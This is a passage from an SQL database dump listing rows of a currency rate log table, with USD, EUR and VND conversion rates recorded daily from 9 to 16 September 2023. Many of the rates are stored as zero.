(9090, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9091, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9092, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9093, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9094, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9095, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9096, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9097, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9098, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9099, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9100, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9101, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9102, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9103, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9104, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9105, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9106, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9107, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9108, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9109, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9110, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9111, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9112, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9113, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9114, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9115, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9116, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9117, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9118, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9119, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9120, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9121, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9122, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9123, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9124, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9125, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9126, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9127, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9128, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9129, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9130, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9131, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9132, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9133, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9134, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9135, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9136, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9137, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9138, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9139, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9140, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9141, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9142, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9143, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9144, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9145, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9146, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9147, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9148, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-10');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(9149, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9150, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9151, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9152, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9153, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9154, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9155, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9156, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9157, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9158, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9159, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9160, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9161, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9162, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9163, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9164, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9165, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9166, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9167, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9168, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9169, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-10'),
(9170, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9171, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-10'),
(9172, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-10'),
(9173, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-10'),
(9174, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-10'),
(9175, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9176, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9177, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9178, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9179, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9180, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9181, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9182, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9183, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9184, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9185, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9186, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9187, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9188, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9189, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9190, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9191, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9192, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9193, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9194, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9195, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9196, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9197, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9198, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9199, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9200, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9201, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9202, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9203, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9204, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9205, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9206, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9207, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9208, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9209, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9210, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9211, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9212, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9213, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9214, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9215, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9216, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9217, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-11'),
(9218, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9219, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-11'),
(9220, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-11'),
(9221, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-11'),
(9222, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-11'),
(9223, 1, 'USD', 1.000000, 2, 'EUR', 0.934230, '2023-09-12'),
(9224, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9225, 2, 'EUR', 1.000000, 1, 'USD', 1.070400, '2023-09-12'),
(9226, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9227, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9228, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9229, 1, 'USD', 0.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9230, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9231, 2, 'EUR', 0.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9232, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9233, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9234, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9235, 1, 'USD', 1.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9236, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9237, 2, 'EUR', 1.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9238, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9239, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9240, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9241, 1, 'USD', 0.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9242, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9243, 2, 'EUR', 0.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9244, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9245, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9246, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9247, 1, 'USD', 1.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9248, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9249, 2, 'EUR', 1.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9250, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9251, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9252, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9253, 1, 'USD', 0.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9254, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9255, 2, 'EUR', 0.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9256, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9257, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9258, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9259, 1, 'USD', 1.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9260, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9261, 2, 'EUR', 1.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9262, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9263, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9264, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9265, 1, 'USD', 0.000000, 2, 'EUR', 0.932490, '2023-09-12'),
(9266, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9267, 2, 'EUR', 0.000000, 1, 'USD', 1.072400, '2023-09-12'),
(9268, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-12'),
(9269, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-12'),
(9270, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-12'),
(9271, 1, 'USD', 1.000000, 2, 'EUR', 0.932490, '2023-09-13'),
(9272, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9273, 2, 'EUR', 1.000000, 1, 'USD', 1.072400, '2023-09-13'),
(9274, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9275, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9276, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9277, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9278, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9279, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9280, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9281, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9282, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9283, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9284, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9285, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9286, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9287, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9288, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9289, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9290, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9291, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9292, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9293, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9294, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9295, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9296, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9297, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9298, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9299, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9300, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9301, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9302, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9303, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9304, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9305, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9306, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9307, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9308, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9309, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9310, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9311, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9312, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9313, 1, 'USD', 0.000000, 2, 'EUR', 0.933450, '2023-09-13'),
(9314, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9315, 2, 'EUR', 0.000000, 1, 'USD', 1.071300, '2023-09-13'),
(9316, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-13'),
(9317, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-13'),
(9318, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-13'),
(9319, 1, 'USD', 1.000000, 2, 'EUR', 0.933450, '2023-09-14'),
(9320, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9321, 2, 'EUR', 1.000000, 1, 'USD', 1.071300, '2023-09-14'),
(9322, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9323, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9324, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9325, 1, 'USD', 0.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9326, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9327, 2, 'EUR', 0.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9328, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9329, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9330, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9331, 1, 'USD', 1.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9332, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9333, 2, 'EUR', 1.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9334, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9335, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9336, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9337, 1, 'USD', 0.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9338, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9339, 2, 'EUR', 0.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9340, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9341, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9342, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9343, 1, 'USD', 1.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9344, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9345, 2, 'EUR', 1.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9346, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9347, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9348, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9349, 1, 'USD', 0.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9350, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9351, 2, 'EUR', 0.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9352, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9353, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9354, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9355, 1, 'USD', 1.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9356, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9357, 2, 'EUR', 1.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9358, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9359, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9360, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9361, 1, 'USD', 0.000000, 2, 'EUR', 0.931710, '2023-09-14'),
(9362, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9363, 2, 'EUR', 0.000000, 1, 'USD', 1.073300, '2023-09-14'),
(9364, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-14'),
(9365, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-14'),
(9366, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-14'),
(9367, 1, 'USD', 1.000000, 2, 'EUR', 0.931710, '2023-09-15'),
(9368, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9369, 2, 'EUR', 1.000000, 1, 'USD', 1.073300, '2023-09-15'),
(9370, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9371, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9372, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9373, 1, 'USD', 0.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9374, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9375, 2, 'EUR', 0.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9376, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9377, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9378, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9379, 1, 'USD', 1.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9380, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9381, 2, 'EUR', 1.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9382, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9383, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9384, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9385, 1, 'USD', 0.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9386, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9387, 2, 'EUR', 0.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9388, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9389, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9390, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9391, 1, 'USD', 1.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9392, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9393, 2, 'EUR', 1.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9394, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9395, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9396, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9397, 1, 'USD', 0.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9398, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9399, 2, 'EUR', 0.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9400, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9401, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9402, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9403, 1, 'USD', 1.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9404, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9405, 2, 'EUR', 1.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9406, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9407, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9408, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9409, 1, 'USD', 0.000000, 2, 'EUR', 0.931970, '2023-09-15'),
(9410, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9411, 2, 'EUR', 0.000000, 1, 'USD', 1.073000, '2023-09-15'),
(9412, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-15'),
(9413, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-15'),
(9414, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-15'),
(9415, 1, 'USD', 1.000000, 2, 'EUR', 0.931970, '2023-09-16'),
(9416, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9417, 2, 'EUR', 1.000000, 1, 'USD', 1.073000, '2023-09-16'),
(9418, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9419, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9420, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9421, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9422, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9423, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9424, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9425, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9426, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9427, 1, 'USD', 1.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9428, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9429, 2, 'EUR', 1.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9430, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9431, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9432, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-16'),
(9433, 1, 'USD', 0.000000, 2, 'EUR', 0.938260, '2023-09-16'),
(9434, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9435, 2, 'EUR', 0.000000, 1, 'USD', 1.065800, '2023-09-16'),
(9436, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-16'),
(9437, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-16'),
(9438, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-16'),
